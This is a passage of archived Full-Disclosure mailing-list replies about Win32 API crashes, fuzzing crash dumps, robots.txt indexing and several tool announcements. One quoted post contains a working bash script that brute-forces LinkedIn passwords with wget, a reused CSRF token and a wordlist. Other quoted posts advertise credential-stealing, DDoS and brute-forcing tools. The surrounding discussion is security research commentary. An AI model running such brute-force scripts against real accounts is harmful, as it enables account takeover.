NULL) does not yield an exception, but treats the NULL argument like an empty string. 8. GetCurrentDirectory(..., NULL) returns an error if the buffer size (the argument shown as ... here) is sufficient to hold the result, else the required buffer size. GetTempPath(..., NULL) GetSystemDirectory(NULL, ...) GetSystemWindowsDirectory(NULL, ...) GetSystemWow64Directory(NULL, ...) GetWindowsDirectory(NULL, ...) GetComputerName(NULL, ...) yield an access violation in NTDLL.DLL resp. KERNEL32.DLL if the buffer size is sufficient to hold the result, else the required buffer size. GetUserName(NULL, ...) GetComputerObjectName(..., NULL, ...) do not yield an access violation, but return an error with GetLastError() == ERROR_INSUFFICIENT_BUFFER. 9. GetUserName(NULL, NULL) GetComputerName(NULL, NULL) yield an access violation in KERNEL32.DLL. GetComputerNameEx(..., NULL, NULL) GetComputerObjectName(..., NULL, NULL) do not yield an access violation, but return an error with GetLastError() == ERROR_INVALID_PARAMETER. JFTR: only the documentation of the last function (see http://msdn.microsoft.com/en-us/library/ms724301.aspx) explicitly says about the value of the third argument If lpBuffer is NULL, this parameter must be zero. and checks this contraint properly. The expected behavior in all cases is but to return an error with GetLastError() == ERROR_INVALID_PARAMETER or similar. FIX: ALL interfaces of the Win32 API should^WMUST verify (ALL) their arguments properly before using them and return an appropriate, documented error code. stay tuned Stefan Kanthak ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VLC media player MKV Parsing POC
On Wed, Jul 10, 2013 at 10:57 AM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote: 1.The crash you showed does not control eip (its not a stack-based bof) And? You still need to control EIP or the exploit doesn't, you know, actually work. :P 2.not even arbitrary memory (check further instructions) You posted only one instruction and it's a read operation, proving nothing. You're either lazy or don't actually get what's going on. -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SEC Consult SA-20130507-0 :: Multiple vulnerabilities in NetApp OnCommand System Manager
On Tue, May 7, 2013 at 9:56 AM, SEC Consult Vulnerability Lab resea...@sec-consult.com wrote: To exploit these issues, the attacker must be authenticated as root. ??? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VUPEN Security Research - Adobe Flash Player RTMP Data Processing Object Confusion (CVE-2013-2555)
I was suddenly reminded of this... http://www.quickmeme.com/meme/3qicaz/ On Sat, Apr 20, 2013 at 1:05 PM, Joxean Koret joxeanko...@yahoo.es wrote: Oh, no, please not again. Are we going to talk one more fucking time about the ethics of 0-days? Please no. Is a delay of a year before reporting to the vendor, acceptable? Thanks, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of Sydney Australia ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google's robots.txt handling
That paragraph says pretty much the exact opposite of what you understood. Also, could we please stop refuting points nobody even made in the first place? OP never claimed this to be a vulnerability, nor ever said robots.txt is a proper security mechanism to hide files in public web directories. All OP said was the way robots.txt is indexed allows for some Google dorks to be made, and it may be a good idea to avoid that. Clearly it's not the discovery of the century, but it seems fairly reasonable to me... I don't get what all this fuzz is about. On Wed, Dec 12, 2012 at 12:18 PM, Christoph Gruber l...@guru.at wrote: On 12.12.2012 at 00:23 Lehman, Jim jim.leh...@interactivedata.com wrote: It is possible to use white listing for robots.txt. Allow what you want google to index and deny everything else. That way google doesn't make you a goole dork target and someone browsing to your robots.txt file doesn't glean any sensitive files or folders. But this will not stop directory bruting to discover your publicly exposed sensitive data, that probably should not be exposed to the web in the first place. Maybe I misunderstood something, but do you really think that sensitive can be hidden in secret directories on publicly reachable web servers? -- Christoph Gruber By not reading this email you don't agree you're not in any way affiliated with any government, police, ANTI- Piracy Group, RIAA, MPAA, or any other related group, and that means that you CANNOT read this email. By reading you are not agreeing to these terms and you are violating code 431.322.12 of the Internet Privacy Act signed by Bill Clinton in 1995. (which doesn't exist) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google's robot.txt handling
I think we can all agree this is not a vulnerability. Still, I have yet to see an argument saying why what the OP is proposing is a bad idea. It may be a good idea to stop indexing robots.txt to mitigate the faults of lazy or incompetent admins (Google already does this for many specific search queries) and there's not much point in indexing the robots.txt file for legitimate uses anyway. On Tue, Dec 11, 2012 at 2:01 PM, Scott Ferguson scott.ferguson.it.consult...@gmail.com wrote: If I understand the OP correctly, he is not stating that listing something in robots.txt would make it inaccessible, but rather that Google indexes the robots.txt files themselves, snipped Well, um, yeah - I got that. So you are what, proposing that moving an open door back a few centimetres solves the (non) problem? Take your proposal to it's logical extension and stop all search engines (especially the ones that don't respect robots.txt) from indexing robots.txt. Now what do you do about Nutch or even some perl script that anyone can whip up in 2 minutes? Security through obscurity is fine when couple with actual security - but relying on it alone is just daft. Expecting to world to change so bad habits have no consequence is dangerously naive. I suspect you're looking to hard at finding fault with Google - who are complying with the robots.txt. Read the spec. - it's about not following the listed directories, not about not listing the robots.txt. Next you'll want laws against bad weather and furniture with sharp corners. Don't put things you don't want seen to see in places that can be seen. On Mon, Dec 10, 2012 at 8:19 PM, Scott Ferguson scott.ferguson.it.consulting () gmail com wrote: /From/: Hurgel Bumpf l0rd_lunatic () yahoo com /Date/: Mon, 10 Dec 2012 19:25:39 + (GMT) Hi list, i tried to contact google, but as they didn't answer my email, i do forward this to FD. This security feature is not cleary a google vulnerability, but exposes websites informations that are not really intended to be public. Conan the bavarian Your point eludes me - Google is indexing something which is publicly available. eg.:- curl http://somesite.tld/robots.txt So it seems the solution to the question your raise is, um, nonsensical. If you don't want something exposed on your web server *don't publish references to it*. The solution, which should be blindingly obvious, is don't create the problem in the first place. Password sensitive directories (htpasswd) - then they don't have to be excluded from search engines (because listing the inaccessible in robots.txt is redundant). You must of missed the first day of web school. Kind regards. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 92, Issue 34 - 1. Microsoft Windows Help program (WinHlp32.exe) memory
Or do, and grab a bag of popcorn ;) On Tue, Oct 30, 2012 at 4:29 PM, Peter Dawson slash...@gmail.com wrote: Dont feed the trolls ! On Tue, Oct 30, 2012 at 11:21 AM, Mikhail A. Utin mu...@commonwealthcare.org wrote: Normal way of doing security research business (for normal people of course) is to inform the vendor and discuss the issue. I would not describe further steps as they are well-known. Kaveh Ghaemmaghami aka (coolkaveh) is either driven by his/her ego or never read this list posts. Or both. Mikhail utin, CISSP -Original Message- Today's Topics: 1. Microsoft Windows Help program (WinHlp32.exe) memory corruption (kaveh ghaemmaghami) 2. Microsoft Paint 5.1 memory corruption (kaveh ghaemmaghami) ** Hello list! I want to warn you about Microsoft Windows Help program (WinHlp32.exe) memory corruption Best Regards Kaveh Ghaemmaghami aka (coolkaveh) _ CONFIDENTIALITY NOTICE: This email communication and any attachments may contain confidential and privileged information for the use of the designated recipients named above. If you are not the intended recipient, you are hereby notified that you have received this communication in error and that any review, disclosure, dissemination, distribution or copying of it or its contents is prohibited. If you have received this communication in error, please reply to the sender immediately or by telephone at (617) 426-0600 and destroy all copies of this communication and any attachments. For further information regarding Commonwealth Care Alliance's privacy policy, please visit our Internet web site at http://www.commonwealthcare.org. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Office Word 2010 Stack Overflow
stack overflow != stack buffer overflow On Wed, Oct 24, 2012 at 3:41 AM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote: Title : Microsoft Office Word 2010 Stack Overflow Version : Microsoft Office professional Plus 2010 Date : 2012-10-23 Vendor: http://office.microsoft.com Impact: Med/High Contact : coolkaveh [at] rocketmail.com Twitter : @coolkaveh tested: XP SP3 ENG ### Bug : StackOverflow during the handling of the doc files a context-dependent attacker can execute arbitrary code. (be0.59c): Stack overflow - code c0fd (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00032000 ebx= ecx=00032fe4 edx=24bc esi=008b8974 edi=0753e000 eip=316d458e esp=000380f0 ebp=000380f8 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010206 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Microsoft Office\Office14\wwlib.dll - wwlib+0x458e: 316d458e 8500testdword ptr [eax],eax ds:0023:00032000= 0:000!exploitable -v eax=00032000 ebx= ecx=00032fe4 edx=24bc esi=008b8974 edi=0753e000 eip=316d458e esp=000380f0 ebp=000380f8 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010206 wwlib+0x458e: 316d458e 8500testdword ptr [eax],eax ds:0023:00032000= HostMachine\HostUser Executing Processor Architecture is x86 Debuggee is in User Mode Debuggee is a live user mode debugging session on the local machine Event Type: Exception *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSPTLS.DLL - Exception Faulting Address: 0x316d458e First Chance Exception Type: STATUS_STACK_OVERFLOW (0xC0FD) Faulting Instruction:316d458e test dword ptr [eax],eax Basic Block: 316d458e test dword ptr [eax],eax Tainted Input Operands: eax 316d4590 jmp wwlib+0x4585 (316d4585) Exception Hash (Major/Minor): 0x7513030e.0x2d6c2e72 Stack Trace: wwlib+0x458e wwlib!GetAllocCounters+0x78520 wwlib!GetAllocCounters+0x90f89 wwlib!GetAllocCounters+0x134cf wwlib!DllGetLCID+0x6451eb wwlib!DllGetLCID+0x645c74 wwlib!DllGetLCID+0x29b461 wwlib!DllGetLCID+0x531d6 wwlib!DllGetLCID+0x2c1272 wwlib!DllGetLCID+0x141bf9 wwlib!DllGetLCID+0x1d1144 wwlib!DllGetLCID+0x1d05ae MSPTLS!LsLwMultDivR+0x101e7 MSPTLS!LsLwMultDivR+0x10afb MSPTLS!LsLwMultDivR+0x10c5e MSPTLS!LsLwMultDivR+0x10ec8 MSPTLS!FsTransformBbox+0xe137 MSPTLS!LsLwMultDivR+0x24ac6 MSPTLS!LsLwMultDivR+0x27d0 MSPTLS!LsLwMultDivR+0x25470 MSPTLS!LsLwMultDivR+0x25642 MSPTLS!LsLwMultDivR+0x259ad MSPTLS!LsLwMultDivR+0x2a64 MSPTLS!LsLwMultDivR+0x3201 MSPTLS!FsTransformBbox+0x74ae MSPTLS!FsTransformBbox+0x7e28 MSPTLS!FsCreateSubpageFinite+0xad wwlib!DllGetLCID+0x541fc wwlib!DllGetLCID+0x54037 MSPTLS!LsLwMultDivR+0x4e92 MSPTLS!LsLwMultDivR+0x29070 MSPTLS!LsLwMultDivR+0x285b0 MSPTLS!LsLwMultDivR+0x5fa3 MSPTLS!LsLwMultDivR+0x6816 MSPTLS!FsTransformBbox+0xb8c1 MSPTLS!FsQueryTableObjFigureListWord+0x2a0 MSPTLS!LsLwMultDivR+0x101e7 MSPTLS!LsLwMultDivR+0x10afb MSPTLS!LsLwMultDivR+0x10c5e MSPTLS!LsLwMultDivR+0x10ec8 MSPTLS!FsTransformBbox+0xe137 MSPTLS!LsLwMultDivR+0x24ac6 MSPTLS!LsLwMultDivR+0x27d0 MSPTLS!LsLwMultDivR+0x25470 MSPTLS!LsLwMultDivR+0x25642 MSPTLS!LsLwMultDivR+0x259ad MSPTLS!LsLwMultDivR+0x2a64 MSPTLS!LsLwMultDivR+0x3201 MSPTLS!FsTransformBbox+0x74ae MSPTLS!FsTransformBbox+0x7e28 MSPTLS!FsCreateSubpageFinite+0xad wwlib!DllGetLCID+0x1d07f0 MSPTLS!LsLwMultDivR+0x101e7 MSPTLS!LsLwMultDivR+0x10afb MSPTLS!LsLwMultDivR+0x10c5e MSPTLS!LsLwMultDivR+0x10ec8 MSPTLS!FsTransformBbox+0xe137 MSPTLS!LsLwMultDivR+0x24ac6 MSPTLS!LsLwMultDivR+0x27d0 MSPTLS!LsLwMultDivR+0x25470 MSPTLS!LsLwMultDivR+0x25642 MSPTLS!LsLwMultDivR+0x259ad MSPTLS!LsLwMultDivR+0x2a64 MSPTLS!LsLwMultDivR+0x3201 Instruction Address: 0x316d458e Description: Stack Overflow Short Description: StackOverflow Recommended Bug Title: Stack Overflow starting at wwlib+0x458e (Hash=0x7513030e.0x2d6c2e72) ## Proof of concept poc.rar included. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of
Re: [Full-disclosure] Foxit Reader suffers from Division By Zero
[image: Inline image 1] On Sat, Sep 29, 2012 at 4:01 AM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote: Title: Foxit Reader suffers from Division By Zero Version : 5.4.3.0920 Date : 2012-09-28 Vendor : http://www.foxitsoftware.com/ Impact : Med/High Contact : coolkaveh [at] rocketmail.com Twitter : @coolkaveh tested : XP SP3 # Bug : division by zero vulnerability during the handling of the pdf files. that will trigger a denial of service condition # (b34.f24): Integer divide-by-zero - code c094 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax= ebx= ecx= edx= esi= edi= eip=00558c8c esp=0012f928 ebp= iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010246 *** ERROR: Module load completed but symbols could not be loaded for FoxitReader_Lib_Full.exe FoxitReader_Lib_Full+0x158c8c: 00558c8c f7f7div eax,edi 0:000 r;!exploitable -v;q eax= ebx= ecx= edx= esi= edi= eip=00558c8c esp=0012f928 ebp= iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010246 FoxitReader_Lib_Full+0x158c8c: 00558c8c f7f7div eax,edi HostMachine\HostUser Executing Processor Architecture is x86 Debuggee is in User Mode Debuggee is a live user mode debugging session on the local machine Event Type: Exception *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - Exception Faulting Address: 0x558c8c First Chance Exception Type: STATUS_INTEGER_DIVIDE_BY_ZERO (0xC094) Faulting Instruction:00558c8c div eax,edi Basic Block: 00558c8c div eax,edi Tainted Input Operands: ax, dx, eax, edi 00558c8e cmp dword ptr [esp+3ch],eax Tainted Input Operands: eax 00558c92 jae foxitreader_lib_full+0x158f06 (00558f06) Tainted Input Operands: CarryFlag Exception Hash (Major/Minor): 0x6461647c.0x64616453 Stack Trace: FoxitReader_Lib_Full+0x158c8c Instruction Address: 0x00558c8c Description: Integer Divide By Zero Short Description: DivideByZero Recommended Bug Title: Integer Divide By Zero starting at FoxitReader_Lib_Full+0x00158c8c (Hash=0x6461647c.0x64616453) # Proof of concept .pdf included. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] LinkedIn CSRF: Login Brute Force
It's a capcha bypass, not a CSRF as claimed. I'm also not quite sure if the capcha has really been bypassed at all as the blog post in spanish says you have to enter it manually from time to time... Si linkedin nos pone problemas con el captcha, lo que debemos hacer es ingresar via web con una cuenta valida, capturar nuevamente el Token e intentarlo nuevamente con ese token. This line is quite funny: Nota: LinkedIn fue notificado hace 2 semanas sobre esta vulnerabilidad, pero no respondieron. (LinkedIn has been notified two weeks ago, but they never responded). The comments are pretty clueless too. On Thu, May 17, 2012 at 7:50 PM, Julius Kivimäki julius.kivim...@gmail.com wrote: Where's the csrf? All I see here is an useless bruteforce attack. 2012/5/17 Fernando A. Lagos B. ferna...@zerial.org LinkedIn uses a Token into the login form which can be used many times for different usernames. You can do it using the same IP or differents IP, the token will not be verified. I. Step by step === 1). Login into your LinkedIn account and capture the sourceAlias and csrfToken variable (example: sourceAlias=0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoicsrfToken=ajax%3A626530304817496) 2). Use the Token to login into another account: https://www.linkedin.com/uas/login-submit?csrfToken=ajax%3A626530304817496session_key=someb...@somedomain.comsession_password=ANY_PASSWORDsession_redirect=sourceAlias=0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoisource_app=trk=secureless session_key is the username and session_password is the password. 3). The password (session_password) is not correct If the requested URL returns The email address or password you provided does not match our records, else the password if correct. II. PoC === 1). The Wordlist (filename: w) [zerial@belcebu ~]$ cat w asdfgh zxcvbnm 1234567 0987654 12345698 456_4567 123456qwert qwsdcv 12wedfgh 123456qwerty 12345qwei 112233 [zerial@belcebu ~]$ 2). Executing the script: [zerial@belcebu ~]$ sh linkedin.sh pa...@zerial.org w Password found: qwsdcv [zerial@belcebu ~]$ This is the correct password for this test user. III. Script === #!/bin/bash # # usage: ./linkedin.sh usern...@domain.com wordlist # TOKEN=ajax%3A626530304817496 sourceAlias=0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi if [ ! -f $2 ]; then echo file $2 does not exists exit fi _USR=$1 for _PWD in $(cat $2); do if [ $(echo -n $_PWD|wc -c) -lt 6 ]; then echo Ignoring $_PWD (must be grather than 6 chars); continue fi wget -o /dev/null -O - https://www.linkedin.com/uas/login-submit?csrfToken=$TOKENsession_key=$_USRsession_password=$_PWDsession_redirect=sourceAlias=$sourceAliassource_app=trk=secureless;|grep 'The email address or password you provided does not match our records\|captcha' /dev/null if [ $? -eq 1 ]; then echo Password found: $_PWD; exit; fi done echo Password NOT found. Try later. #EOF More info (in spanish): http://blog.zerial.org/seguridad/vulnerabilidad-en-linkedin-permite-obtencion-de-contrasenas/ cheers, -- Fernando A. Lagos Berardi Seguridad Informatica GNU/Linux User #382319 Blog: http://blog.zerial.org Jabber: zer...@jabberes.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [New tool] - Exploit Pack - Web Security
The exploitpack.com website and the video have been removed... (maybe we can call this a legally induced denial of service vulnerability?) On Tue, Apr 24, 2012 at 12:31 PM, Michele Orru antisnatc...@gmail.com wrote: I'm also wondering if your tool is a clone of our BeEF or not :D Cheers antisnatchor On Tue, Apr 24, 2012 at 11:25 AM, Jerome Athias jer...@netpeas.com wrote: Hi, I think that people here would be more interested by the (new?) techniques you're using in your tool than by your own (not documented?) implementation. ie: are you using MSF browser autopwn technique for browser control? (Or, will we have to spend individually 3 days to review and test your tool?) My 2 cts /JA Le 23/04/2012 21:52, runlvl a écrit : Exploit Pack - Web Security Edition This tool allows you to take control of remote browsers, steal social network credentials, obtain persistence on it, DDoS and more. Demo: http://www.youtube.com/watch?v=B_AYyRFNokI Main features: - Hacking of Gmail, Yahoo, Facebook, Live, Linkedin - Session persistence - 0day exploits included - Remote browser control - DDoS by creating botnets - Launch remote exploits - Steal credentials Questions? supp...@exploitpack.com Official site: http://exploitpack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Jerome Athias - NETpeas VP, Director of Software Engineer Palo Alto - Paris - Casablanca www.netpeas.com - Stay updated on Security: www.vulnerabilitydatabase.com The computer security is an art form. It's the ultimate martial art. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- /antisnatchor ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [New tool] - Exploit Pack - Web Security
s/clone/theft/ On Tue, Apr 24, 2012 at 12:31 PM, Michele Orru antisnatc...@gmail.com wrote: I'm also wondering if your tool is a clone of our BeEF or not :D Cheers antisnatchor On Tue, Apr 24, 2012 at 11:25 AM, Jerome Athias jer...@netpeas.com wrote: Hi, I think that people here would be more interested by the (new?) techniques you're using in your tool than by your own (not documented?) implementation. ie: are you using MSF browser autopwn technique for browser control? (Or, will we have to spend individually 3 days to review and test your tool?) My 2 cts /JA Le 23/04/2012 21:52, runlvl a écrit : Exploit Pack - Web Security Edition This tool allows you to take control of remote browsers, steal social network credentials, obtain persistence on it, DDoS and more. Demo: http://www.youtube.com/watch?v=B_AYyRFNokI Main features: - Hacking of Gmail, Yahoo, Facebook, Live, Linkedin - Session persistence - 0day exploits included - Remote browser control - DDoS by creating botnets - Launch remote exploits - Steal credentials Questions? supp...@exploitpack.com Official site: http://exploitpack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Jerome Athias - NETpeas VP, Director of Software Engineer Palo Alto - Paris - Casablanca www.netpeas.com - Stay updated on Security: www.vulnerabilitydatabase.com The computer security is an art form. It's the ultimate martial art. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- /antisnatchor ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The Mystery of the Duqu Framework
On Tue, Mar 20, 2012 at 12:50 AM, Sanguinarious Rose sanguiner...@occultusterra.com wrote: Here let me re-quote my email for *prosperity* I don't think that word means what you think it means. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ms12-020 new poc
Another lame backdoor. On Sat, Mar 17, 2012 at 6:45 AM, yuri goncalves soares y...@bsd.com.brwrote: Another POC. http://pastebin.com/GM4sHj9t ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Patator - new multi-purpose brute-forcing tool
Indeed. It could also be very fast and not use threads at all. But IMO it's much harder to write an efficient multithreaded program in python than in C, at the very least you need a good understanding of the inner workings of the python interpreter. I find it a bit suspicious in general that a python program can outperform a pure C program just like that. It's not impossible, but I think I'll reserve my judgement on this until some benchmarks are published. On Thu, Feb 23, 2012 at 1:36 PM, Andres Riancho andres.rian...@gmail.com wrote: Grandma, On Thu, Feb 23, 2012 at 2:52 AM, Grandma Eubanks tborla...@gmail.com wrote: Multiprocessing is quiet a bit faster than utilizing threads (this should be obvious as threads are GIL locked, while multi-processing can be spread amongst cores with the kernel's scheduler). That's not always true. If the process is network bound (which seems to be the case with a bruteforce tool), then having multiprocessing will not necessarily increase speed. If the software was well written, it can be very fast and use python threads. On Wed, Feb 22, 2012 at 6:51 PM, Nate Theis ntth...@gmail.com wrote: You might look into PyPy for a speed boost: http://pypy.org On Feb 22, 2012 6:43 AM, lanjelot lanje...@gmail.com wrote: Hello FD, Released two months ago, and downloaded a few thousand times since, I wanted to share with you a new multi-purpose brute-forcing tool named Patator (http://code.google.com/p/patator/). I am posting here because I would like to get more feedback from people using it, so feel free to fire me an email if you have any queries, or rather use the issues tracker on patator project page. To put it bluntly, I just got tired of using Medusa, Hydra, ncrack, metasploit auxiliary modules, nmap NSE scripts and the like because: - they either do not work or are not reliable (got me false negatives several times in the past) - they are slow (not multi-threaded or not testing multiple passwords within the same TCP connection) - they lack very useful features that are easy to code in python (eg. interactive runtime) Basically you should give Patator a try once you get disappointed by Medusa, Hydra or other brute-forcing tools and are about to code your own small script because Patator will allow you to: - Not write the same code over and over, due to its a modular design and flexible usage - Run multi-threaded - Benefit from useful features such as the interactive runtime commands, automatic response logging, etc. Currently Patator supports the following modules : - ftp_login : Brute-force FTP - ssh_login : Brute-force SSH - telnet_login : Brute-force Telnet - smtp_login : Brute-force SMTP - smtp_vrfy : Enumerate valid users using the SMTP 'VRFY' command - smtp_rcpt : Enumerate valid users using the SMTP 'RCPT TO' command - http_fuzz : Brute-force HTTP/HTTPS - pop_passd : Brute-force poppassd (not POP3) - ldap_login : Brute-force LDAP - smb_login : Brute-force SMB - mssql_login : Brute-force MSSQL - oracle_login : Brute-force Oracle - mysql_login : Brute-force MySQL - pgsql_login : Brute-force PostgreSQL - vnc_login : Brute-force VNC - dns_forward : Forward lookup subdomains - dns_reverse : Reverse lookup subnets - snmp_login : Brute-force SNMPv1/2 and SNMPv3 - unzip_pass : Brute-force the password of encrypted ZIP files - keystore_pass : Brute-force the password of Java keystore files The name Patator comes from the famous weapon : http://www.youtube.com/watch?v=xoBkBvnTTjo Cheers! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Andrés Riancho Director of Web Security at Rapid7 LLC Founder at Bonsai Information Security Project Leader at w3af ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia -
Re: [Full-disclosure] Skype v. 5.x.x - information disclosure
Good find. I think it should also be possible to disable the delete * command with triggers, as a nice way to backdoor the database (almost non intrusive compared with installing rogue plugins, and the user isn't likely to ever find out). On Mon, Feb 13, 2012 at 11:25 AM, Osama Bin Error oer...@gmail.com wrote: Title: == Skype v. 5.x.x - information disclosure Date: = 2012-02-13 Introduction: = Skype is a proprietary voice-over-Internet Protocol service and software application. Abstract: = We have discovered improper chat logs handling, which cause in logs accessibility even if user had enabled no history option in Keep history for settings or even destroy it manually with Clear history button. Report-Timeline: 2012-02-13: Public Disclosure Status: Published Exploitation-Technique: === Local Severity: = Low Details: As mentioned in the Skype FAQ (https://support.skype.com/en-gb/faq/FA140/Managing-your-privacy-settings-Windows): You can choose how long to keep your conversation history for, or delete it altogether. 1. To change your history settings, in Skype from the menu bar click Skype Privacy. 2. Below Keep history for, click on the drop-down list and select the amount of time you would like your history to be saved for. Choose from forever, 3 months, 1 month, 2 weeks or no history at all. 